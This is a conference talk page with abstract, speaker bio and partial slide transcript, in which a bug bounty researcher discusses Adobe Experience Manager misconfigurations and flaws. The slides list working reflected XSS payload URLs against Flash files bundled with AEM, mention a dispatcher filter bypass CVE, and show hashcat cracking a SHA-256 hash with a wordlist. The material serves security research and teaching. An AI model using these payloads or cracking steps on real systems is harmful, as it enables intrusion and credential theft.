
A story of the passive aggressive sysadmin of AEM

Frans Rosén
September 13, 2018

# By Frans Rosén

Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers.

Then came security.

Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentally exposed an international multi-billion-dollar company using only sad thoughts.

# About speaker

Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top-ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne.

Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time, and the results of his security research have been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.


Transcript

  2. @fransrosen Frans Rosén. Bug bounties! labs.detectify.com twitter.com/fransrosen. I blogged about Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt. Live hacking! I won a boxing belt once. Namedropped in ytcracker - green hat.
  3. @fransrosen Shit no one’s updating. Stuff you pay your consultants for. Adobe "black magic glue". How AEM is structured.
  7. @fransrosen How AEM is structured: Apache HTTP server module (Reverse proxy+filter), A bunch of admin-tools, Pages + metadata + content. You should not have access to this. Or this.
  9. @fransrosen Creating pages: Author creates a new page in the repo. Goes through the publisher nodes. Dispatcher serves the content.
  11. @fransrosen Accessing pages: Dispatcher gets the URL. Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try). If all is OK, serve from publish node.
  12. @fransrosen CVE-2016-0957 aka "I am two years old but I’m inside an enterprise product that no one can or dares to upgrade"
  13. @fransrosen CVE-2016-0957. Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
  24. @fransrosen FLASHFEST in AEM CORE
    /etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//
    /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf?onclick=jav%gascript:confirm(document.domain)
    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf?javascriptCallbackFunction=alert(document.domain)-String
    /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//
    /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//
    /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=alert(document.domain)-window
    /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//
    /etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window
    Thx Neal Poole
  25. @fransrosen WTF
    $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" | base64 -D | xxd -p | tr -d '\n')
    $ echo $h
    e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a0825798
  26. @fransrosen hashcat ftw
    $ echo $h > hash.txt
    $ ./hashcat.app -a 0 -m 1400 hash.txt rockyou.txt
    Status.........: Cracked
    Started: Thu Sep 13 11:59:23 2018
    Stopped: Thu Sep 13 11:59:25 2018